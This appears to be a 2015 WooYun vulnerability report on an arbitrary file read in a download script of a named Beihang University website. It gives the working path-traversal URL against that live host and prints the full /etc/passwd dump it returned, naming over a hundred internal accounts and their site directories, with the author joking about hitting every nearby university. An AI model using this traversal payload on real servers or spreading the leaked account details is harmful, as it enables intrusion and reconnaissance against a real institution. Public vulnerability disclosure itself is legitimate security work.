当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102738

漏洞标题:北京航空航天大学任意文件读取

相关厂商:北京航空航天大学

漏洞作者: 路人甲

提交时间:2015-03-24 12:57

修复时间:2015-03-29 12:58

公开时间:2015-03-29 12:58

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

把身边的大学都撸一遍把···

详细说明:

http://si.buaa.edu.cn/download.php?file_name=../../../../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././passwd

QQ截图20150320222721.jpg

QQ截图20150320222735.jpg

先下载,后读取文件·····

漏洞证明:

at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:105:106:User for Avahi:/var/run/avahi-daemon:/bin/false
beagleindex:x:107:108:User for Beagle indexing:/var/cache/beagle:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
dnsmasq:x:104:65534:dnsmasq:/var/lib/empty:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
ftpsecure:x:102:65534:Secure FTP User:/var/lib/empty:/bin/false
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:110:113:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
mysql:x:60:105:MySQL database admin:/var/lib/mysql:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:106:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:108:109:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:109:112:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:103:103:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
B1127:x:1080:8:B1127:/www/jgyh.buaa.edu.cn:/bin/false
LiHui:x:1086:8:LiHui:/www//sirs.buaa.edu.cn:/bin/false
ase:x:1025:8:ase:/www/www.ase.buaa.edu.cn:/bin/false
audit:x:1005:8:audit:/www/audit.buaa.edu.cn:/bin/false
avionics:x:1065:8:avionics:/www/avionics.buaa.edu.cn:/bin/false
baomichu:x:1114:100:baomichu:/www/bmc.buaa.edu.cn:/bin/false
bhbs:x:1006:8:bhbs:/www/bhbs.buaa.edu.cn:/bin/false
bhgyygs:x:1098:8:bhgyygs:/www/gyygs.buaa.edu.cn:/bin/false
bhuef:x:1007:8:bhuef:/www/bhuef.buaa.edu.cn:/bin/false
bhyanyu:x:1051:8:bhyanyu:/www//bhyanyu.buaa.edu.cn:/bin/false
bjddxh:x:1002:8:bjddxh:/www//bjbmgcxh.buaa.edu.cn:/bin/false
bmgss2013:x:1102:8:bmgss2013:/www//bmgss2013.buaa.edu.cn:/bin/false
bookbuaaing:x:1116:8:bookbuaaing:/www/booking.buaa.edu.cn:/bin/false
buaa3902ee:x:1026:8:buaa3902ee:/www/www.buaa3902.buaa.edu.cn:/bin/false
buaadnc:x:1074:8:buaadnc:/www/dnc.buaa.edu.cn:/bin/false
buaafcftp:x:1087:8:buaafcftp:/www/flying.buaa.edu.cn:/bin/false
buaagsu:x:1029:8:buaagsu:/www/gsu.buaa.edu.cn:/bin/false
buaaigss:x:1024:8:buaaigss:/www/igss.buaa.edu.cn:/bin/false
buaame:x:1020:8:buaame:/www/www.buaame.com:/bin/false
buaampl:x:1082:8:buaampl:/www/mpl.buaa.edu.cn:/bin/false
buaaqixian:x:1060:8:buaaqixian:/www/qixiannew.buaa.edu.cn:/bin/false
bwc:x:1009:8:bwc:/www/bwc.buaa.edu.cn:/bin/false
careersem:x:1119:8:careersem:/www/careersem.buaa.edu.cn:/bin/false
cceadmin:x:1063:8:cceadmin:/www/cce.buaa.edu.cn:/bin/false
ccfai2013:x:1095:8:ccfai2013:/www/www.ccfai2013.org:/bin/false
cgnccdhb:x:1112:100:cgnccdhb:/www/cgncc.buaa.edu.cn:/bin/false
cgtg:x:1077:8:cgtg:/www/cgtgnew.buaa.edu.cn:/bin/false
charlesfaw:x:1079:8:charlesfaw:/www/control.buaa.edu.cn:/bin/false
chem:x:1093:8:chem:/www/chem.buaa.edu.cn:/bin/false
chiocs:x:1075:8:chiocs:/www/na.buaa.edu.cn:/bin/false
csc2013:x:1103:8:csc2013:/www/csc2013.buaa.edu.cn:/bin/false
cvischina:x:1072:8:cvischina:/www/cvis.buaa.edu.cn:/bin/false
datamining:x:1021:8:datamining:/www/datamining.buaa.edu.cn:/bin/false
dayuncun:x:1090:8:dayuncun:/www/dayuncun.buaa.edu.cn:/bin/false
dhbgnc:x:1106:8:dhbgnc:/www/gnccsaa.buaa.edu.cn:/bin/false
driver:x:1059:8:driver:/www/driver.buaa.edu.cn:/bin/false
e102:x:1034:8:e102:/www/e102.buaa.edu.cn:/bin/false
econometrics:x:1036:8:econometrics:/www/econometrics.buaa.edu.cn:/bin/false
ecpkn:x:1109:8:ecpkn:/www/ecpknevaluation.buaa.edu.cn:/bin/false
eelab:x:1050:8:eelab:/www/eelab:/bin/false
fanti:x:1041:8:fanti:/www/systems.buaa.edu.cn:/bin/false
fantimond:x:1040:8:fantimond:/www/sias.buaa.edu.cn:/bin/false
fclftp:x:1061:8:fclftp:/www/fcl.buaa.edu.cn:/bin/false
fiaawebmaster:x:1011:8:fiaawebmaster:/www/www.fiaa2011.buaa.edu.cn:/bin/false
fls:x:1049:8:fls:/www/fls.buaa.edu.cn:/bin/false
foton:x:1010:8:foton:/www/foton.buaa.edu.cn:/bin/false
fxy:x:1001:8:fxy:/www/fxy.buaa.edu.cn:/bin/false
ga922:x:1069:8:ga922:/www/ga.buaa.edu.cn:/bin/false
gcbuaa:x:1052:8:gcbuaa:/www/gc.buaa.edu.cn:/bin/false
gncftp:x:1019:8:gncftp:/www/gnc.buaa.edu.cn:/bin/false
gongbell:x:1073:8:gongbell:/www/bojiang.buaa.edu.cn:/bin/false
gsubuaa:x:1083:8:gsubuaa:/www/gsunew.buaa.edu.cn:/bin/false
gym:x:1038:8:gym:/www/eda.buaa.edu.cn:/bin/false
gyy:x:1078:8:gyy:/www/gyy.buaa.edu.cn:/bin/false
hanly:x:1085:8:hanly:/www/finance.buaa.edu.cn:/bin/false
highya:x:1089:8:highya:/www/highya.buaa.edu.cn:/bin/false
hk:x:1008:8:hk:/www/hk.buaa.edu.cn:/bin/false
hqglc:x:1012:8:hqglc:/www/hqglc.buaa.edu.cn:/bin/false
hss:x:1016:8:hss:/www/www.hss.buaa.edu.cn:/bin/false
huiyi:x:1115:100:huiyi:/www/nicbooking.buaa.edu.cn:/bin/false
icctp:x:1071:8:icctp:/www/icctp.buaa.edu.cn:/bin/false
iearth:x:1004:8:iearth:/www/iearth.buaa.edu.cn:/bin/false
ifeee:x:1088:8:ifeee:/www/ifeee.buaa.edu.cn:/bin/false
igssbuaa:x:1084:8:igssbuaa:/www/igssnew.buaa.edu.cn:/bin/false
iiip:x:1062:8:iiip:/www/www.iiip.buaa.edu.cn:/bin/false
infortheory:x:1104:8:infortheory:/www/infortheory.buaa.edu.cn:/bin/false
infosecurity:x:1022:8:infosecurity:/www/infosecurity.buaa.edu.cn:/bin/false
instrument:x:1043:8:instrument:/www/instrument.buaa.edu.cn:/bin/false
iripbuaa:x:1027:8:iripbuaa:/www//irip.buaa.edu.cn:/bin/false
irmct:x:1055:8:irmct:/www/irmct.buaa.edu.cn:/bin/false
isip:x:1054:8:isip:/www/isip.buaa.edu.cn:/bin/false
istar:x:1120:100:istar:/www/istar.buaa.edu.cn:/bin/false
itbuaa:x:1068:8:itbuaa:/www/it.buaa.edu.cn:/bin/false
itm:x:1064:8:ITM:/www/qixian.buaa.edu.cn:/bin/false
jwjc:x:1048:8:jwjc:/www/jwjc.buaa.edu.cn:/bin/false
kxfz:x:1000:8:kxfz:/www/kxfz.buaa.edu.cn:/bin/false
leohf1029:x:1117:8:leohf1029:/www/bigdata.buaa.edu.cn:/bin/false
lmib:x:1030:8:lmib:/www/lmib.buaa.edu.cn:/bin/false
lmnbuaa:x:1045:8:lmnbuaa:/www/lmnbuaa:/bin/false
ltx:x:1013:8:ltx:/www/ltx.buaa.edu.cn:/bin/false
ltxnew:x:1081:8:ltxnew:/www/ltxnew.buaa.edu.cn:/bin/false
luoyang:x:1097:8:luoyang:/www/luoyang.buaa.edu.cn:/bin/false
math2:x:1108:8:math2:/www/math2test.buaa.edu.cn:/bin/bash
mathstat:x:1033:8:mathstat:/www/mathstat.buaa.edu.cn:/bin/false
me:x:1023:8:me:/www/www.me.buaa.edu.cn:/bin/false
mechatronics:x:1107:8:mechatronics:/www/mechatronics.buaa.edu.cn:/bin/false
melab:x:1101:8:melab:/www/www.melab.buaa.edu.cn:/bin/false
msestu:x:1100:8:msestu:/www/msestu.buaa.edu.cn:/bin/false
msun:x:1032:8:msun:/www/msun.buaa.edu.cn:/bin/false
mwclass:x:1053:8:mwclass:/www/mwclass.buaa.edu.cn:/bin/false
naaa:x:1014:8:naaa:/www/naaa.buaa.edu.cn:/bin/false
nastl:x:1056:8:nastl:/www/nlaa.buaa.edu.cn:/bin/false
navcon:x:1035:8:navcon:/www/navcon.buaa.edu.cn:/bin/false
nicoa:x:1003:8:nicoa:/www/nicoa.buaa.edu.cn:/bin/false
nrrgeditor:x:1118:8:nrrgeditor:/www/netrel.buaa.edu.cn:/bin/false
nucl-th:x:1092:8:nucl-th:/www/nucl-th.buaa.edu.cn:/bin/false
optimization:x:1046:8:optimization:/www/optimization:/bin/false
pec7936:x:1037:8:pec7936:/www/pec.buaa.edu.cn:/bin/false
qts2013:x:1110:8:qts2013:/www/qts.buaa.edu.cn:/bin/false
quanquan:x:1076:8:quanquan:/www/quanquan.buaa.edu.cn:/bin/false
reladmin:x:1096:8:reladmin:/www/rel.buaa.edu.cn:/bin/false
rseetcadmin:x:1111:8:rseetcadmin:/www/rseetc.buaa.edu.cn:/bin/false
scadmin:x:1058:8:scadmin:/www/smartcampus.buaa.edu.cn:/bin/false
sce:x:1015:8:sce:/www/sce.buaa.edu.cn:/bin/false
semfamily:x:1113:8:semfamily:/www/semfamily:/bin/false
si:x:1039:8:si:/www/si.buaa.edu.cn:/bin/false
sulong:x:1057:8:sulong:/www/www.thebook.com.cn:/bin/false
sxfh:x:1031:8:sxfh:/www/sxfh.buaa.edu.cn:/bin/false
tyb:x:1066:8:tyb:/www/tyb.buaa.edu.cn:/bin/false
tybold:x:1099:8:tybold:/www//tyb.buaa.edu.cntingyong:/bin/false
wbxt:x:1070:8:wbxt:/www//wbxt.buaa.edu.cn:/bin/false
wegss:x:1067:8:wegss:/www/wegss:/bin/false
welcom:x:1094:8:welcom:/www/welcom.buaa.edu.cn:/bin/false
wikiadmin:x:1044:8:wikiadmin:/www/wiki.buaa.edu.cn:/bin/false
wyxtra:x:1047:8:wyxtra:/www/tra.fld.buaa.edu.cn:/bin/false
xiaobao:x:1028:8:xiaobao:/www/xiaobao.buaa.edu.cn:/bin/false
xiguanlixue:x:1091:8:xiguanlixue:/www/xglx.buaa.edu.cn:/bin/false
xsdx:x:1042:8:xsdx:/www/xsdx.buaa.edu.cn:/bin/false
xwgk:x:1017:8:xwgk:/www/xwgk.buaa.edu.cn:/bin/false
xyy:x:1018:8:xyy:/www/xyy.buaa.edu.cn:/bin/false
yoyo-balance:x:1105:8:yoyo-balance:/www/yoyo-balance.buaa.edu.cn:/bin/false
zhjt:x:1121:8:zhjt:/www/zhjt.buaa.edu.cn:/bin/false

修复方案:

大学网站难道就没有waf么···

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-29 12:58

厂商回复:

最新状态:

暂无